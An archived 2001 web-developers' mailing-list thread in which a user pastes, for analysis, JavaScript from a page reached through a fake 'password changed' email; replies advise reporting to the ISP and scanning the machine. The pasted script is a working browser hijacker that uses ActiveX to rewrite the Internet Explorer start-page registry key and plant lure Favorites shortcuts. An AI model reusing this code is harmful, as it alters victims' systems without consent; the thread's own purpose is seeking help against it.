Re: Not so nice JS intruding on a computer without ones knowledge
by "Webmaster" <nstar92(at)bellatlantic.net>
|
Date: |
Sun, 12 Aug 2001 14:19:05 -0400 |
To: |
"Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>, "Webmaster(at)kapnkreations.com" <webmaster(at)kapnkreations.com>, "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org> |
References: |
kapnkreations cincy |
|
todo: View
Thread,
Original
|
|
I would send it on to abuse(at)yourisp.com
----- Original Message -----
From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
To: "Webmaster(at)kapnkreations.com" <webmaster(at)kapnkreations.com>;
"Hwg-Techniques (E-mail)" <hwg-techniques(at)hwg.org>
Sent: Saturday, August 11, 2001 10:41 AM
Subject: Re: Not so nice JS intruding on a computer without ones knowledge
> Yes I agree, I see the registry keys there. The script didn't do as it
was
> designed. I have no favorites marked that way and It wasn't able to
change
> my home page as I figure the script is attempting. However, I tracked
down
> the site owner, the isp this is located on, the isp from the email, and
all
> that. I have never really actively pursued a spammer, but would like to
> really go after this one.
>
> Anyone know how to do that? This is a nasty thing, and I think the isp
> where the site is housed, should know. I am writing letters as we speak.
>
> Nancy
>
>
> Ouch! Those look frightfully like registry settings......(I am a Mac
> Developer so I apologize if my syntax is incorrect)! I tend to delete
> immediately anything that arrives from suspicious sources - not even
> previewing in the preview pane.
>
> I would run some serious diagnostics on your machine....anti-virus, some
> disk utilities, etc.
>
>
> --
> Blane Warrene
> Chief Technology Officer
> Kap`n Kreations | Internet Solutions
> cto(at)kapnkreations.com
> http://www.kapnkreations.com
>
> > From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
> > Date: Fri, 10 Aug 2001 16:57:27 -0400
> > To: "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
> > Subject: Not so nice JS intruding on a computer without ones knowledge
> >
> > Hello,
> >
> > I am curious. I got an email, and it had a simple message.. Your
> password
> > has been changed. To restore your password click here. Well I knew it
> was
> > a trap of sorts, but to stay on top of things I went there any way.
> >
> > When I got there it was a blank page, that said your password has been
> > restored. Nothing esle. Website I have never seen before. In viewing
> the
> > html, the page calls up a javascript.
> >
> > I captured the script below: Would someone please tell me what all this
> > thing has done? Obviously it is attempting to make changes to my
> registry,
> > favorites folder, but what else has is it doing?
> > Thanks in Advance
> > Nancy
> > (I changed the two urls that it included to generics to use as examples.
> I
> > had just had a friend experiece this and it is very angering for me.)
> >
> > _________________________________________
> >
> > document.write("<APPLET HEIGHT=0 WIDTH=0
> > code=com.ms.activeX.ActiveXComponent></APPLET>")
> >
> >
> >
> > function AddFavLnk(loc, DispName, SiteURL)
> > {
> > var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
> > Shor.TargetPath = SiteURL;
> > Shor.Save();
> > }
> >
> > function f(){
> > try
> > {
> > a1=document.applets[0];
> > a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> > a1.createInstance();
> > Shl = a1.GetObject();
> > a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> > a1.createInstance();
> > FSO = a1.GetObject();
> > a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
> > a1.createInstance();
> > Net = a1.GetObject();
> >
> > try{
> >
> > var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
> 90));
> > document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
> > path=/;"
> >
> >
> >
>
////////////////////////////////////////////////////////////////////////////
> > ///��ҳ
> >
> >
> > Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
> > Page", "http://badwebsitename here/");
> > var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
> 90));
> > document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
> > path=/;"
> > var WF, Shor, loc;
> > WF = FSO.GetSpecialFolder(0);
> > loc = WF + "\\Favorites";
> >
> > if(!FSO.FolderExists(loc))
> > {
> > loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName
+
> > "\\Favorites";
> > if(!FSO.FolderExists(loc))
> > {
> > return;
> > }
> > }
> >
> >
>
////////////////////////////////////////////////////////////////////////////
> > ///�ղؼ�
> >
> >
> > AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
> > AddFavLnk(loc, " Aol", "http://www.aol.com");
> > }
> > catch(e){ }
> > }
> > catch(e){ }
> > }
> > function init(){
> > setTimeout("f()", 1000);
> > }
> > init();
> > _______________________________________________
> >
>
>
>
HWG hwg-techniques mailing list archives,
maintained by Webmasters @ IWA